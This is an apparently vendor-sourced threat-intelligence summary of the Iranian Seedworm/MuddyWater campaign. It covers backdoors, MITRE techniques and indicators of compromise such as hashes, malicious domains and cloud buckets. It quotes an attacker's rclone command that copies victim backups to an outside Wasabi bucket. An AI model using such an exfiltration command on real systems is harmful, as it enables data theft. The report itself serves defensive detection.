Seedworm (aka MuddyWater/Temp Zagros/Static Kitten) has been observed active on multiple U.S. corporate and NGO networks since February 2026, deploying novel backdoors (Dindoor using Deno, and Python-based Fakeset) and attempting exfiltration via Rclone to cloud storage. The activity involved signed malware (certificates issued to “Amy Cherne” and “Donald Gay”), hosting on Backblaze S3 endpoints, and links to previously observed Stagecomp/Darkcomp activity, indicating a coordinated Iranian espionage campaign with potential for disruptive follow-on attacks. #Seedworm #Dindoor
Keypoints
- Seedworm intrusions were detected on networks of a U.S. bank, an airport, a U.S. software company’s Israeli office, and a Canadian non-profit starting February 2026 and continuing after recent U.S./Israeli strikes on Iran.
- Researchers discovered a previously unknown Deno-based backdoor named Dindoor (signed with a certificate to “Amy Cherne”) on multiple victim networks and a separate Python backdoor Fakeset (signed by “Amy Cherne” and “Donald Gay”).
- Attempted data exfiltration using Rclone to a Wasabi cloud storage bucket was observed for the software company; payloads and backdoors were also hosted on Backblaze S3 endpoints (gitempire and elvenforest buckets).
- Certificate reuse links this activity to other Seedworm-linked tooling (Stagecomp/Darkcomp) and suggests the same actor despite some malware families not being observed in target networks.
- Iran-aligned hacktivist and state-linked groups (Handala, Druidfly, Damselfly, Marshtreader/Mantis) have conducted DDoS, wiper, spear-phishing, and reconnaissance operations in recent months, raising risk of disruptive or destructive attacks amid the current conflict.
- Defensive recommendations include enhanced monitoring for credential attacks and exfiltration (large outbound transfers, Rclone usage), deploying WAF/DDoS protection, enforcing MFA and conditional access, patching internet-facing services, and isolating backups to prepare for potential destructive operations.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – Malicious Office attachments were used to deliver the Phoenix backdoor: (‘The attackers leveraged a malicious Office attachment that has technical overlap with previously reported Seedworm attacks to deliver Phoenix’).
- [T1566.003] Spearphishing via Service / Compromised Mailbox – A compromised mailbox was used to distribute a custom backdoor: (‘used a compromised mailbox to distribute a custom backdoor known as Phoenix’).
- [T1110.003] Password Spraying – Password-spraying attacks were observed against Israeli municipal government entities: (‘a successful password-spraying attack conducted from Nord VPN infrastructure against Israeli municipal government entities’).
- [T1190] Exploit Public-Facing Application – Scanning and exploitation of camera vulnerabilities was performed using known CVEs to gather intelligence: (‘scanning for vulnerable cameras using CVE-2023-6895 and CVE-2017-7921’).
- [T1595.002] Active Scanning / Vulnerability Scanning – Widespread scanning activity against exposed targets and API endpoints was observed as reconnaissance: (‘Scanning activity against exposed API endpoints’).
- [T1499] Endpoint Denial of Service (DDoS) – Pro-Palestinian hacktivists and other actors mounted high-volume DDoS attacks using amplification and SYN/RST floods: (‘high-volume DDoS attacks … including TCP RST, DNS amplification, TCP SYN floods and NTP amplification attacks’).
- [T1485] Data Destruction – Wiper malware has been used in destructive operations historically and in recent attacks (e.g., BibiWiper, Shamoon): (‘wiper encrypted files on the hard disk before overwriting the master boot record (MBR) and crashing the computer’).
- [T1567.002] Exfiltration to Cloud Storage – Data exfiltration attempts used Rclone to copy backups to a Wasabi cloud bucket: (‘rclone copy CSIDL_DRIVE_FIXEDbackups wasabi:[REMOVED]:/192.168.0.x’).
- [T1219] Remote Access Tools – Legitimate remote access tools and RATs were hosted/used for persistence and remote control (PDQ, AnyDesk, ScreenConnect): (‘the C&C server also reportedly hosted the PDQ remote access tool’ and ‘Use of the remote desktop tools AnyDesk and ScreenConnect’).
- [T1078] Valid Accounts – Compromised mailboxes and credential harvesting were used to facilitate distribution and access: (‘used a compromised mailbox to distribute a custom backdoor’ and multiple campaigns focused on credential theft and mailbox compromise).
- [T1553] Subvert Trust Controls (Code Signing Abuse) – Malware samples were signed with certificates issued to named individuals, indicating abuse of code-signing trust: (‘This backdoor was signed with a certificate issued to “Amy Cherne”’ and ‘Fakeset was signed by certificates issued to “Amy Cherne” and “Donald Gay”’).
Indicators of Compromise
- [File Hashes] Malware samples observed on victim networks – examples: 0f9cf1cf8d641562053ce533aaa413754db88e60 (Trojan.Dindoor), 15061036c702ad92b56b35e42cf5dc334597e73 (Trojan.Fakeset), and many other Dindoor/Fakeset/Stagecomp/Darkcomp hashes.
- [Domains / URLs] Hosting and distribution endpoints – examples: gitempire.s3.us-east-005.backblazeb2[.]com, elvenforest.s3.us-east-005.backblazeb2[.]com, and other domains including uppdatefile[.]com, serialmenot[.]com, moonzonet[.]com.
- [Code-signing Certificate Subjects] Certificates used to sign malware – examples: subjects “Amy Cherne” and “Donald Gay” (both used to sign observed backdoors and samples linked to Seedworm activity).
- [Tools / Filenames] Tools and commands observed in exfiltration or execution – examples: Rclone command used to Wasabi (‘rclone copy CSIDL_DRIVE_FIXEDbackups wasabi:[REMOVED]:/192.168.0.x’) and Deno runtime used by Dindoor to execute payloads.
- [Cloud Storage Buckets] Cloud exfiltration/hosting targets – example: Wasabi cloud storage bucket used as an exfiltration target (bucket name redacted in reporting) and Backblaze S3 buckets used to host payloads (gitempire/elvenforest endpoints).
Read more: https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us